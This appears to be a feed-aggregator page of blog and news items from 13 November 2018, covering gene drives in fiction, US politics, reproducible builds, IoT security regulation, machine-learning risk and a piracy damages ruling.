Tuesday, 13 November

16:35

Link [Scripting News]

As a language hacker I wonder if we could make a meme somehow happen where people think the word flake came from Jeff Flake instead of it being a coincidence.

16:28

Security updates for Tuesday [LWN.net]

Security updates have been issued by Debian (firmware-nonfree and imagemagick), Fedora (cabextract, icecast, and libmspack), openSUSE (icecast), Red Hat (httpd24), Slackware (libtiff), SUSE (apache-pdfbox, firefox, ImageMagick, and kernel), and Ubuntu (clamav, spamassassin, and systemd).

16:14

The Big Idea: Nancy Kress [Whatever]

Wiping out a terrible disease that kills millions each year: An unmitigated good, yes? Well, hold on there — Nancy Kress is here to explain how there are consequences to every action, and what those consequences mean for you, and her new novel, Terran Tomorrow.

NANCY KRESS:

Why should you care about gene drives?

Right now, I can see you thinking: I don’t! Next! But give me five minutes to explain why you should.

First, the five-second-or-so version (depending on how fast you read): Genes drive can, and soon will try to, eliminate an entire species.  Sparrows, wolves, mosquitos, and you are all species.

The five-minute version: A gene drive is an artificial “selfish gene” capable of forcing itself into 99% of an animal’s offspring, instead of the usual 50%. Theoretically, they could affect promoter genes, which are in charge of turning other genes on and off. In actuality so far, we know that they can affect reproduction by turning all males or females (pick one) of a species sterile. We know this because London researchers, supported in large part by the Gates Foundation, have succeeded in creating this gene drive in females of the malaria-carrying mosquito Anopheles gambiae sterile. At the same time, as part of the international effort Target Malaria, a small field trial with sterile male Anopheles will begin in Burkina Faso by the end of 2018. If all goes well, Anopheles may eventually be eliminated, and with it malaria.

What if all does not go well?

What if it does?

What if the same technique is used to eliminate other species?

These are the places that hard science fiction looks for stories—the impact craters of major technological advances like gene drives. I write hard SF, and my new novel, Terran Tomorrow, is interested in the impacts, good and bad, of genetic engineering on the natural world. Since those impacts are made by people, Terran Tomorrow deals not only with how people mess around with genes but also, and more importantly, why.  For what good or bad reasons, under what circumstances, with what consequences. How do we clean up other people’s genetic messes? How do we clean up our own—and at what personal sacrifices? Science is much more about people than petri dishes.

Terran Tomorrow is the conclusion of my Tomorrow’s Kin trilogy, which began with the Nebula-winning novella “Yesterday’s Kin.”  In the first book, aliens came to Earth. In the second book, humans went to World. In this third book, humans and a few aliens return to Earth, and are startled and shocked by the changes since they left. Environmental changes, personal changes, a complete upending of the social order. Time dilation, if it brings a decade of genetic warfare, can do that.

Marianne Jenner, evolutionary biologist, is caught between the clashing philosophies of her now-grown grandsons, ecologist Colin Jenner and his brother, U.S. Army Colonel Jason Jenner. Geneticist Zack McKay and his fractious scientific team are trying under impossible conditions to create a planet-saving gene drive. Alien visitors are rebelling. So are ex-wives. A civil war rages. And sparrows are now deadly.

Sparrows? Yes, because, as I mentioned in the five-minute version of why gene drives matter, they can theoretically affect other genes besides those regulating the reproductive system. There are also promoter genes affecting various metabolic pathways in organs such as the brain.

In real life, scientists are exploring links between microglia, a form of brain cells, and both schizophrenia and Alzheimer’s, in which microglia don’t seem to be functioning optimally. Could a gene drive change that? Or cause it? What else in the brain can be permanently changed with a gene drive?

In Terran Tomorrow, people must confront and act on two of the most difficult questions in genetics: How much risk do we undertake in experimenting with the building blocks of life? And if others have experimented and the results are catastrophic, how much risk do we undertake trying to clean up their disaster?

There are no easy answers to those questions, not in real life nor in fiction. That’s what makes the questions worth doing what SF does best: rehearsing one possible future. Because gene drives are already here.

—-

Terran Tomorrow: Amazon|Barnes & Noble|Indiebound|Powell’s

Read an excerpt. Visit the author’s site. Follow her on Facebook.

 

16:00

15:49

Link [Scripting News]

It's somewhat embarrassing to have all those 0 Likes on my posts, but I'm going to leave them there. It's a worthwhile bootstrap imho. It can lead somewhere if we want it to.

Link [Scripting News]

Something bothered me about CNN's protest of their reporter being excluded from the White House. It took me a while to pinpoint. I guess they would like us to have their back -- but do they have ours? They do so many things that sell us out as they chase profit. It's as if they've found a way to monetize America's failure. Maybe one of these events will wake them up and they'll realize they aren't protected anymore than we are, and they should do what they can to halt our descent, even if it makes them lose money. Until they do that, I don't see why I should care whose reporters are in the White House carrying the Republican message.

15:14

Saying good-bye to the original Microsoft Redmond campus [The Old New Thing]

The end is near for the original Microsoft Redmond campus. The nine buildings that formed the original campus are slated for demolition to make way for a new campus redesign. The buildings are making a final farewell tour this month, and last week, former Microsoft employees were invited back for one last hurrah in Building 2.

Not mentioned in the article is a sign posted in the front door of the building:

Building Closed

Access Restricted


What's Happening

This building is being prepared and made safe for demolition.

What this means to you.

You will no longer get lost trying to find the conference rooms.

Need help?

We appreciate your understanding and cooperation during this work. If you left any belongings or articles behind and wish to retrieve them please contact xxxxxx.

15:07

Link [Scripting News]

In January, House Dems should pass a bill that updates the Affordable Care Act to fix all that should have been fixed in 2014, and undoes the damage Repubs did. This is the platform for 2020.

Link [Scripting News]

I was just telling a friend about Al Pacino's speech in Any Given Sunday. I know a lot of people don't like sports movies but this one is the story of age, how the coach and the young quarterback (played by Jamie Foxx) learn to work together. It's got all the schmaltz of typical sports movie. But the acting is so good, and the story simple and universal and heart-grabbing. Old people remember being young. We aren't young anymore, but we have experience and knowledge to offer, and when we work together the winning is so much sweeter. I would like the newly elected Democrat reps to watch this movie and work with Nancy Pelosi. She knows how to win. We have a really big problem to solve and we have to work together to solve it. If we don't work together, we'll die as individuals.

14:28

Reproducible builds folks: Reproducible Builds: Weekly report #185 [Planet Debian]

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes outside of Git which was a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing to subprocess.run and to fix the parsing of the “issue” selector option.


This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

14:14

Congressional Democrats' first bill aims to end gerrymandering, increase voter registration and rein in campaign finance [Cory Doctorow – Boing Boing]

HR1, the first bill that the new Democratic House of Representatives will vote on, is omnibus legislation that takes on some of the most pervasive scourges of representative democracy: vote suppression, oligarchic campaign financing and gerrymandering.

Under HR1's provisions, electoral districting will be taken away from state legislatures and handed to independent commissions (this is very popular with the American public and similar ballot initiatives just sailed into law in Colorado, Missouri and Michigan).

HR1 provides for automatic voter registration and reestablishes provisions from the Voting Rights Act that the Supreme Court neutered in 2013 (though as Yves notes at Naked Capitalism, "If they actually cared about voter turnout they would push election day registration which, unlike automatic registration, has been shown to increase turnout by around 5%").

HR1 also overturns Citizens United (previously), the 2010 Supreme Court decision that opened the floodgates to unlimited, oligarchic campaign spending, including hundreds of millions in "dark money" funneled into Super-PACs.

HR1 doesn't stop there: it also closes a loophole that exempts presidents from conflict of interest rules (a loophole that Trump has enthusiastically exploited).

It's not clear how the bill will fare; Senate Republicans are likely to be divided on it, and the provisions that override the Supreme Court are unlikely to find a hospitable reception in the current court.

But as a stake in the ground, it's a pretty impressive outing: forcing GOP politicians to vote in favor of dark money, gerrymandering, and allowing for presidential conflict-of-interest will give the Democrats a lot to campaign on in 2020.

"It's three very basic things that I think the public wants to see," said Rep. John Sarbanes (D-Md.), who spearheads campaign finance and government ethics efforts for the House Democratic Caucus. He said H.R. 1 will "demonstrate that we hear that message loud and clear."

But even Sarbanes admits the quick vote is just a first step. Republicans, who control the Senate, are unlikely to pass the bill and President Trump is unlikely to sign it. "Give us the gavel in the Senate in 2020 and we'll pass it in the Senate," Sarbanes said. "Give us a pen in the Oval Office and we'll sign those kinds of reforms into law."

The bill would establish automatic voter registration and reinvigorate the Voting Rights Act, crippled by a Supreme Court decision in 2013. It would take away redistricting power from state legislatures and give it to independent commissions.

Other provisions would overturn the Supreme Court's Citizens United ruling, which declared political spending is First Amendment free speech; they would mandate more disclosure of outside money and establish a public financing match for small contributions.

Democrats Say Their First Bill Will Focus On Strengthening Democracy At Home [Peter Overby/NPR]

(via Naked Capitalism)

(Image: Kheel Center, CC-BY)

Common sense: the Chomsky/Piaget debates come to AI [Cory Doctorow – Boing Boing]

In 1975, Noam Chomsky and Jean Paiget held a historic debate about the nature of human cognition; Chomsky held that babies are born with a bunch of in-built rules and instincts that help them build up the knowledge that they need to navigate the world; Piaget argued that babies are effectively blank slates that acquire knowledge from experiencing the world (including the knowledge that there is a thing called "experience" and "the world").

For most of AI's history, Chomsky's approach prevailed: computer scientists painstakingly tried to equip computers with a baseline of knowledge about the relationships between things in the world, hoping that computers would some day build up from this base to construct complex, powerful reasoning systems.

The current machine learning revolution can be traced to a jettisoning of this approach in favor of a Piaget-style blank slate, where layers of neural nets are trained on massive corpuses of data (sometimes labeled by hand, but often completely blank) and use equally massive computation to make sense of the data, creating their own understanding of the world.

Piaget-style deep learning has taken AI a long way in a short time, but it's hitting a wall. It's not just the weird and vastly entertaining local optima that these systems get stuck in: it's the huge corpuses of data needed to train them and the inability of machine learning to generalize one model to bootstrap another and another.

The fall-off the rate of progress in machine learning, combined with the excitement that ML's recent gains provoked, has breathed new life into the Chomskyian approach to ML, and computer scientists all over the world are trying to create "common sense" corpuses of knowledge that they can imbue machine learning systems with before they are exposed to training data.

This approach seems to be hurdling some of the walls that stopped the Piaget-style ML. Some Chomskyian ML models attained a high degree of efficiency with much smaller training data sets.

Frequent Boing Boing contributor Clive Thompson's long piece on the state of the Chomsky/Piaget debate in ML is an excellent read, and really comes to the (retrospectively) obvious conclusion: it doesn't really matter whether Chomsky or Piaget are right about how kids learn, because each of them is right about how computers learn -- a little from Column A, a little from Column B.

But a bit of hand coding could be how you replicate some of the built-in knowledge that, according to the Chomskyite view, human brains possess. That’s what Dileep George and the Vicarious researchers did with Breakout. To create an AI that wouldn’t get stumped by changes to the layout of the game, they abandoned deep learning and built a system that included hard-coded basic assumptions. Without too much trouble, George tells me, their AI learned “that there are objects, and there are interactions between objects, and that the motion of one object can be causally explained between the object and something else.”

As it played Breakout, the system developed the ability to weigh different courses of action and their likely outcomes. This worked in reverse too. If the AI wanted to break a block in the far left corner of the screen, it reasoned to put the paddle in the far right corner. Crucially, this meant that when Vicarious changed the layout of the game—adding new bricks or raising the paddle—the system compensated. It appeared to have extracted some general understanding about Breakout itself.

Granted, there are trade-offs in this type of AI engineering. It’s arguably more painstaking to craft and takes careful planning to figure out precisely what foreordained logic to feed into the system. It’s also hard to strike the right balance of speed and accuracy when designing a new system. George says he looks for the minimum set of data “to put into the model so it can learn quickly.” The fewer assumptions you need, the more efficiently the machine will make decisions. Once you’ve trained a deep-learning model to recognize cats, you can show it a Russian blue it has never seen and it renders the verdict—it’s a cat!—almost instantaneously. Having processed millions of photos, it knows not only what makes a cat a cat but also the fastest way to identify one. In contrast, Vicarious’ style of AI is slower, because it’s actively making logical inferences as it goes.

How to Teach Artificial Intelligence Some Common Sense [Clive Thompson/Wired]

13:28

Big Tech got big because we stopped enforcing antitrust law (not because tech is intrinsically monopolistic) [Cory Doctorow – Boing Boing]

Tim Wu (previously) is a legal scholar best known for coining the term "Net Neutrality" -- his next book, The Curse of Bigness: Antitrust in the New Gilded Age (previously) challenges the accepted wisdom about today's digital monopolists, which is that they grew so big because of some underlying truth about online business ("first-mover advantage," "network effects," "globalism," etc). Instead, Wu argues that the reason we got digital monopolies is that we stopped enforcing anti-monopoly rules against digital companies (and then against all kinds of companies).

In a new excerpt from "The Curse of Bigness" published today on Wired, Wu fleshes out this argument in more depth, with a fast-moving history of how regulators were lulled into a belief in the especially competitive markets in technology because of the quick rise and fall of companies like AOL, leading to a hands-off approach to regulating the tech markets that allowed for the rise and rise of companies like Google and Facebook.

I'm looking forward to reading the rest of the book -- it's obvious that while these special theories of tech's intrinsic competitiveness were key to lulling regulators to sleep during the 2000s and 2010s, the theories also dovetailed with a modern economic orthodoxy from the University of Chicago that held that unless companies were raising prices, there was no reason to limit their actions.

Unfortunately, antitrust law failed to notice that the 1990s were over. Instead, for a decade and counting, it gave the major tech players a pass—even when confronting fairly obvious dangers and anticompetitive mergers. That is best exemplified by the Facebook story. Launched in 2004, Facebook quickly dispatched its rival, MySpace, which had been a rare Los Angeles tech-success story but had become a mess of intrusive advertising, fake users, and trolls. In just a few years, Facebook achieved an early dominance over general-purpose social networking.

But by the 2010s, Facebook faced one of its most serious challengers, a startup named Instagram. Instagram combined a camera app with a social network on which it was easy and fast to share photos on mobile. It was popular with younger people, and it was not long before some of its advantages over Facebook were noticed. As business writer Nicholas Carlson said at the time, Instagram “allows people to do what they like to do on Facebook easier and faster.”

Having already gained 30 million users in just 18 months of existence, Instagram was poised to become a leading challenger to Facebook based on its strength on mobile platforms, where Facebook was weak. By the doctrine of internet time, Facebook, then eight years old, was supposed to be heading into retirement.

How Google and Amazon Got Away With Not Being Regulated [Tim Wu/Wired]

13:21

New IoT Security Regulations [Schneier on Security]

Due to ever-evolving technological advances, manufacturers are connecting consumer goods­ -- from toys to light bulbs to major appliances­ -- to the Internet at breakneck speeds. This is the Internet of Things, and it's a security nightmare.

The Internet of Things fuses products with communications technology to make daily life more effortless. Think Amazon's Alexa, which not only answers questions and plays music but allows you to control your home's lights and thermostat. Or the current generation of implanted pacemakers, which can both receive commands and send information to doctors over the Internet.

But like nearly all innovation, there are risks involved. And for products born out of the Internet of Things, this means the risk of having personal information stolen or devices being overtaken and controlled remotely. For devices that affect the world in a direct physical manner -- ­cars, pacemakers, thermostats­ -- the risks include loss of life and property.

By developing more advanced security features and building them into these products, hacks can be avoided. The problem is that there is no monetary incentive for companies to invest in the cybersecurity measures needed to keep their products secure. Consumers will buy products without proper security features, unaware that their information is vulnerable. And current liability laws make it hard to hold companies accountable for shoddy software security.

It falls upon lawmakers to create laws that protect consumers. While the US government is largely absent in this area of consumer protection, the state of California has recently stepped in and started regulating the Internet of Things, or "IoT" devices sold in the state­ -- and the effects will soon be felt worldwide.

California's new SB 327 law, which will take effect in January 2020, requires all "connected devices" to have a "reasonable security feature." The good news is that the term "connected devices" is broadly defined to include just about everything connected to the Internet. The not-so-good news is that "reasonable security" remains defined such that companies trying to avoid compliance can argue that the law is unenforceable.

The legislation requires that security features must be able to protect the device and the information on it from a variety of threats and be appropriate to both the nature of the device and the information it collects. California's attorney general will interpret the law and define the specifics, which will surely be the subject of much lobbying by tech companies.

There's just one specific in the law that's not subject to the attorney general's interpretation: default passwords are not allowed. This is a good thing; they are a terrible security practice. But it's just one of dozens of awful "security" measures commonly found in IoT devices.

This law is not a panacea. But we have to start somewhere, and it is a start.

Though the legislation covers only the state of California, its effects will reach much further. All of us­ -- in the United States or elsewhere­ -- are likely to benefit because of the way software is written and sold.

Automobile manufacturers sell their cars worldwide, but they are customized for local markets. The car you buy in the United States is different from the same model sold in Mexico, because the local environmental laws are not the same and manufacturers optimize engines based on where the product will be sold. The economics of building and selling automobiles easily allows for this differentiation.

But software is different. Once California forces minimum security standards on IoT devices, manufacturers will have to rewrite their software to comply. At that point, it won't make sense to have two versions: one for California and another for everywhere else. It's much easier to maintain the single, more secure version and sell it everywhere.

The European General Data Protection Regulation (GDPR), which implemented the annoying warnings and agreements that pop up on websites, is another example of a law that extends well beyond physical borders. You might have noticed an increase in websites that force you to acknowledge you've read and agreed to the website's privacy policies. This is because it is tricky to differentiate between users who are subject to the protections of the GDPR­ -- people physically in the European Union, and EU citizens wherever they are -- ­and those who are not. It's easier to extend the protection to everyone.

Once this kind of sorting is possible, companies will, in all likelihood, return to their profitable surveillance capitalism practices on those who are still fair game. Surveillance is still the primary business model of the Internet, and companies want to spy on us and our activities as much as they can so they can sell us more things and monetize what they know about our behavior.

Insecurity is profitable only if you can get away with it worldwide. Once you can't, you might as well make a virtue out of necessity. So everyone will benefit from the California regulation, as they would from similar security regulations enacted in any market around the world large enough to matter, just like everyone will benefit from the portion of GDPR compliance that involves data security.

Most importantly, laws like these spur innovations in cybersecurity. Right now, we have a market failure. Because the courts have traditionally not held software manufacturers liable for vulnerabilities, and because consumers don't have the expertise to differentiate between a secure product and an insecure one, manufacturers have prioritized low prices, getting devices out on the market quickly and additional features over security.

But once a government steps in and imposes more stringent security regulations, companies have an incentive to meet those standards as quickly, cheaply, and effectively as possible. This means more security innovation, because now there's a market for new ideas and new products. We've seen this pattern again and again in safety and security engineering, and we'll see it with the Internet of Things as well.

IoT devices are more dangerous than our traditional computers because they sense the world around us, and affect that world in a direct physical manner. Increasing the cybersecurity of these devices is paramount, and it's heartening to see both individual states and the European Union step in where the US federal government is abdicating responsibility. But we need more, and soon.

This essay previously appeared on CNN.com.

12:49

Four short links: 13 November 2018 [All - O'Reilly Media]

Ways of Working, Too-Smart AI, Wi-Fi Vision, and Materials Science AI

  1. Internet-Era Ways of Working -- an elegant brief summary of how we do software in 2018, from Tom Loosemore's public.digital team.
  2. Examples of AI Gaming the System -- a list of examples of AIs learning more than was intended. Neural nets evolved to classify edible and poisonous mushrooms, took advantage of the data being presented in alternating order, and didn't actually learn any features of the input images. (via BoingBoing)
  3. Using Wi-Fi to “See” Behind Closed Doors is Easier than Anyone Thought (MIT TR) -- if all you are interested in is the movement of people. Humans also reflect and distort this Wi-Fi light. The distortion, and the way it moves, would be clearly visible through Wi-Fi eyes, even though the other details would be smeared. This crazy Wi-Fi vision would clearly reveal whether anybody was behind a wall and, if so, whether the person was moving. That’s the basis of Zhu and co’s Wi-Fi-based peeping tom. It looks for changes in an ordinary Wi-Fi signal that reveal the presence of humans.
  4. Learning Process-Structure-Property Relations -- clever research project that mines research literature to learn relationships about the physical properties and processes in materials science, then automatically generates a diagam for the particular constraints your project has. Code released as open source.

Continue reading Four short links: 13 November 2018.

Managing risk in machine learning [All - O'Reilly Media]

Considerations for a world where ML models are becoming mission critical.

In this post, I share slides and notes from a keynote I gave at the Strata Data Conference in New York last September. As the data community begins to deploy more machine learning (ML) models, I wanted to review some important considerations.

Let’s begin by looking at the state of adoption. We recently conducted a survey which garnered more than 11,000 respondents—our main goal was to ascertain how enterprises were using machine learning. One of the things we learned was that many companies are still in the early stages of deploying machine learning (ML):

deploying machine learning

As far as reasons for companies holding back, we found from a survey we conducted earlier this year that companies cited lack of skilled people, a “skills gap,” as the main challenge holding back adoption.

Interest on the part of companies means the demand side for “machine learning talent” is healthy. Developers have taken notice and are beginning to learn about ML. In our own online training platform (which has more than 2.1 million users), we’re finding strong interest in machine learning topics. Below are the top search topics on our training platform:

machine learning training

Beyond “search,” note that we’re seeing strong growth in consumption of content related to ML across all formats—books, posts, video, and training.

Before I continue, it’s important to emphasize that machine learning is much more than building models. You need to have the culture, processes, and infrastructure in place before you can deploy many models into products and services. At the recent Strata Data conference we had a series of talks on relevant cultural, organizational, and engineering topics. Here's a list of a few clusters of relevant sessions from the recent conference:

Over the last 12-18 months, companies that use a lot of ML and employ teams of data scientists have been describing their internal data science platforms (see, for example, Uber, Netflix, Twitter, and Facebook). They share some of the features I list below, including support for multiple ML libraries and frameworks, notebooks, scheduling, and collaboration. Some companies include advanced capabilities, including a way for data scientists to share features used in ML models, tools that can automatically search through potential models, and some platforms even have model deployment capabilities:

machine learning model deployment capabilities

As you get beyond prototyping and you actually begin to deploy ML models, there are many challenges that will arise as those models begin to interact with real users or devices. David Talby summarized some of these key challenges in a recent post:

  • Your models may start degrading in accuracy
  • Models will need to be customized (for specific locations, cultural settings, domains, and applications)
  • Real modeling begins once in production

There are also many important considerations that go beyond optimizing a statistical or quantitative metric. For instance, there are certain areas—such as credit scoring or health care—that require a model to be explainable. In certain application domains (including autonomous vehicles or medical applications), safety and error estimates are paramount. As we deploy ML in many real-world contexts, optimizing statistical or business metics alone will not suffice. The data science community has been increasingly engaged in two topics I want to cover in the rest of this post: privacy and fairness in machine learning.

Privacy and security

Given the growing interest in data privacy among users and regulators, there is a lot of interest in tools that will enable you to build ML models while protecting data privacy. These tools rely on building blocks, and we are beginning to see working systems that combine many of these building blocks. Some of these tools are open source and are becoming available for use by the broader data community:

machine learning tools
  • Federated learning is useful when you want to collaborate and build a centralized model without sharing private data. It’s used in production at Google, but we still are in need of tools to make federated learning broadly accessible.
  • We’re starting to see tools that allow you to build models while guaranteeing differential privacy, one of the most popular and powerful definitions of privacy. At a high-level these methods inject random noise at different stages of the model building process. These emerging sets of tools aim to be accessible to data scientists who are already using libraries such as scikit-learn and TensorFlow. The hope is that data scientists will soon be able to routinely build differentially private models.
  • There’s a small and growing number of researchers and entrepreneurs who are investigating whether we can build or use machine learning models on encrypted data. This past year, we’ve seen open source libraries (HElib and Palisade) for fast homomorphic encryption, and we have startups that are building machine learning tools and services on top of those libraries. The main bottleneck here is speed: many researchers are actively investigating hardware and software tools that can speed up model inference (and perhaps even model building) on encrypted data.
  • Secure multi-party computation is another promising class of techniques used in this area.

Fairness

Now let’s consider fairness. Over the last couple of years, many ML researchers and practitioners have started investigating and developing tools that can help ensure ML models are fair and just. Just the other day, I searched Google for recent news stories about AI, and I was surprised by the number of articles that touch on fairness.

For the rest of this section, let’s assume one is building a classifier and that certain variables are considered “protected attributes” (this can include things like age, ethnicity, gender, ...). It turns out that the ML research community has used numerous mathematical criteria to define what it means for a classifier to be fair. Fortunately, a recent survey paper from Stanford—A Critical Review of Fair Machine Learning—simplifies these criteria and groups them into the following types of measures:

criteria for a classifier to be fair
  • Anti-classification means the omission of protected attributes and their proxies from the model or classifier.
  • Classification parity means that one or more of the standard performance measures (e.g., false positive and false negative rates, precision, recall) are the same across groups defined by the protected attributes.
  • Calibration: If an algorithm produces a “score,” that “score” should mean the same thing for different groups.

However, as the authors from Stanford point out in their paper, each of the mathematical formulations described above suffers from limitations. With respect to fairness, there is no black box or series of procedures that you can stick your algorithm into that can give it a clean bill of health. There is no such thing as a “one size, fits all” procedure.

Because there’s no ironclad procedure, you will need a team of humans-in-the-loop. Notions of fairness are not only domain and context sensitive, but as researchers from UC Berkeley recently pointed out, there is a temporal dimension as well (“We advocate for a view toward long-term outcomes in the discussion of ‘fair’ machine learning”). What is needed are data scientists who can interrogate the data and understand the underlying distributions, working alongside domain experts who can evaluate models holistically.

Culture and organization

As we deploy more models, it’s becoming clear that we will need to think beyond optimizing statistical and business metrics. While I haven’t touched on them during this short post, it’s clear that reliability and safety are going to be extremely important moving forward. How do you build and organize your team in a world where ML models have to take many other important things under consideration?

ml reliability and safety

Fortunately there are members of our data community who have been thinking about these problems. The Future of Privacy Forum and Immuta recently released a report with some great suggestions on how one might approach machine learning projects with risk management in mind:

  • When you’re working on a machine learning project, you need to employ a mix of data engineers, data scientists, and domain experts.
  • One important change outlined in the report is the need for a set of data scientists who are independent from this model-building team. This team of “validators” can then be tasked with evaluating the ML model on things like explainability, privacy, and fairness.

Closing remarks

So, what skills will be needed in a world where ML models are becoming mission critical? As noted above, fairness audits will require a mix of data and domain experts. In fact, a recent analysis of job postings from NBER found that compared with other data analysis skills, machine learning skills tend to be bundled with domain knowledge.

But you’ll also need to supplement your data and domain experts with with legal and security experts. Moving forward, we’ll need to have legal, compliance, and security people working more closely with data scientists and data engineers.

ml skills and teams

This shouldn’t come as a shock: we already invest in desktop security, web security, and mobile security. If machine learning is going to eat software, we will need to grapple with AI and ML security, too.

Related content:

Continue reading Managing risk in machine learning.

[1044] Family Reunion [Twokinds]

Comic for November 13, 2018

12:35

Representative Line: An Equal Crunch [The Daily WTF]

Rina works in an environment which tends to favor crunch. It's a bit of a feast or famine situation, where they'll coast for months on a pretty standard 9-5 schedule, and then bam, suddenly...

11:42

The magic of a book launch [Seth's Blog]

Today is launch day for my new book. Thanks to fast-clicking readers and alumni, it’s already a bestseller. You can check out some of the advance reviews. And the Financial Times picked it one of November’s books of the month. And 800CEOREAD just long listed it as one of the best marketing books of the year…

Lots of cool surprises in this post, just for you and my other favorite blog readers…

For the first time, we’re hosting an online launch party. If you grab a copy in the next two weeks, we’d love to have you join us.

The launch party will feature exclusive videos from me expanding on ideas in the book, an ongoing Q&A session and most of all, a chance to connect with thousands of other alumni of our online seminar and the purchasers of the book as well. You’ll find a cohort of fascinating and generous people there, and my hope is that if you’re an eager contributor to the party, you’ll find that it’s even worth more than the cost of the book itself.

If you’re an early adopter, the kind of person who goes first, you’re our kind of person. Join the launch party to meet more people like us. If you get a copy in the next week or so, you can join in. Sign up here.

The launch party is free to join for readers. Once you buy a copy of the book, you’ll find a code on the bottom of page 260 (or in the Kindle edition, at the end of the acknowledgments) that will get you into the Party. If you’re listening on audio, use the link at the bottom of the page.

One more thing…

Along the way, we’ve created:

An action figure, a milk carton, a cereal box, not one but two books that each weighed 17 pounds, a wooden boxed set, a letterpress poster and many more–and each sold out. All created at breakeven, all for fun, all for the true fans. Your chance to have something that almost no one else does.

And the new one is fun indeed:

Find out more about the collectible here.

There are only 2,000 of them in the warehouse, and we’re not going to make any more. I hope you’ll check it out before they’re all gone. There are 19 different covers packed in four different sets of 8… see if you can collect them all.

And what will you do with those 7 extra books, the ones that come with a limited-edition custom cover?

I’m hoping you’ll share them.

You might share them with co-workers because you know that if you can all get on the same page, your marketing will work better and you’ll be more likely to be able to do work you’re proud of.

You could share them with non-profit leaders or political leaders, because you want their work to spread.

And perhaps you’ll share them with your students, your friends or those you admire, because now’s the best time to make a ruckus.

Person to person, horizontally.

Making the covers and the custom box and the rest of it was thrilling, and I can’t thank you enough for letting us do this work. Highlights from the book in tomorrow’s post…

10:35

SETTV IPTV Service Ordered to Pay DISH $90,000,000 in Piracy Damages [TorrentFreak]

Back in April, the Alliance for Creativity and Entertainment, the global anti-piracy alliance featuring several Hollywood studios, Amazon, Netflix, and dozens of other entertainment companies, sued Florida-based SET Broadcast, LLC.

The popular unauthorized IPTV was accused of being a piracy tool offering copyright-infringing streams to a large number of subscribers. Early June, SETTV went offline after a second lawsuit was filed against the company.

In a Florida court, DISH Network and encryption partner NagraStar sued several individuals, companies and trusts collectively doing business as SETTV via the domain SETTVNOW.com. The plaintiffs stated that the complex business structure was designed to frustrate enforcement efforts and hide profits made by SET Broadcast and various individuals.

“Defendants created a pirate streaming television service they have branded ‘SET TV’,” the complaint reads, citing offenses under the Federal Communications Act (FCA).

“Defendants sell subscriptions and devices for the SET TV pirate streaming service, which includes numerous television channels that were received without authorization from DISH’s satellite service and were subsequently retransmitted without authorization on the SET TV pirate streaming service.”

DISH and NagraStar alleged that “for only $20 per month”, SET TV gave users access to more than 500 live channels, including on-demand content and PPV broadcasts. The company also sold pre-configured hardware devices that came pre-loaded with the SET TV application. As a result, the plaintiffs demanded a permanent injunction plus huge damages.

In an agreed judgment handed down by a Florida court (the merits of the case were not considered), the demands of DISH and NagraStar have now been met.

“DISH is awarded statutory damages of $90,199,000 under the FCA. The statutory damages are calculated at the parties’ agreed upon $500 for each of the 180,398 subscribers that were acquired directly by Defendants and provided with unauthorized access to DISH’s television programming using Defendants’ SetTV streaming service. Defendants are jointly and severally liable for all damages awarded herein,” the judgment reads.

The defendants in the case (and anyone acting in concert with them) are also permanently enjoined from “receiving, retransmitting, or copying, or assisting others in receiving, retransmitting, or copying, any of DISH’s satellite or over-the-top Internet transmissions of television programming or any content contained therein without authorization”, and having any dealings with infringing subscriptions, set-top devices, or applications.

DISH also won the right to take ownership of all SETTV-branded set-top boxes, similar devices sold through resellers and affiliates, plus subscription codes, passwords and applications relating to the SETTV service.

Additionally, SETTV is required to hand over any domains relating to its service, including but not limited to SETTVNOW.com and SETBROADCAST.com.

“The judgment and injunction against the SetTV service marks a significant victory in the ongoing fight against pay-TV piracy, and a win for consumers who subscribe to legitimate pay-TV services,” DISH said in a statement.

“Following extensive discovery, DISH and the SetTV Defendants reached a confidential settlement agreement. Pursuant to that agreement, the Parties filed stipulated facts and admissions of liability by the SetTV Defendants, along with an agreed judgment and permanent injunction that was entered by the Court on October 24, 2018.

“In compliance with the Court’s injunction, the SetTV service has been shut down permanently and the websites used to operate the service, along with all remaining inventory of receivers and subscription codes, will be forfeited for destruction.”

In common with similarly large damages rulings, it’s unlikely that SETTV will pay anything like the amount cited by the Court. However, the $90m judgment makes great headlines and is likely to act as a deterrent to all but the most aggressive US-based pirates.

The original complaint and subsequent judgment can be found here and here (pdf)

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

09:56

Feeds | 9th ConfOA: the Brazil-Portugal Conference on Open Access [Planet GridPP]

9th ConfOA: the Brazil-Portugal Conference on Open Access s.aragon 13 November 2018 - 9:08am

By Raniere Silva, Software Sustainability Institute, Stephan Druskat, Humboldt-Universität zu Berlin. ConfOA is the Brazil-Portugal Conference about Open Access and the 9th edition was hosted in Lisbon, Portugal between the 2nd and 4th October 2018. Although the conference only has open access in its name, it is the place to talk about the broader concept of open science with many stakeholders.

08:14

AIDS, HIV and PrEP by Silver [Oh Joy Sex Toy]

Erika and I have been wanting to do an HIV, AIDS, PrEP comic for yearrrrrs, but always felt like we needed an expert closer to the subject. Fortunately, Silver is here today to share with us his fantastic comic that does a great job of breaking it all down, far better than we could have. This was a huge project and I think it turned out just amazing.

Check out the links below for more info, but keep in mind there are different rules with regards to the recommended use of PrEP in the US, as compared with the rest of the world. We also did a comic about getting an STI test here!

Go drop Silver some silver! Or at the very least, some nice comments:

Further Reading


What is PrEP?/¿Qué es PrEP? (Short video!)
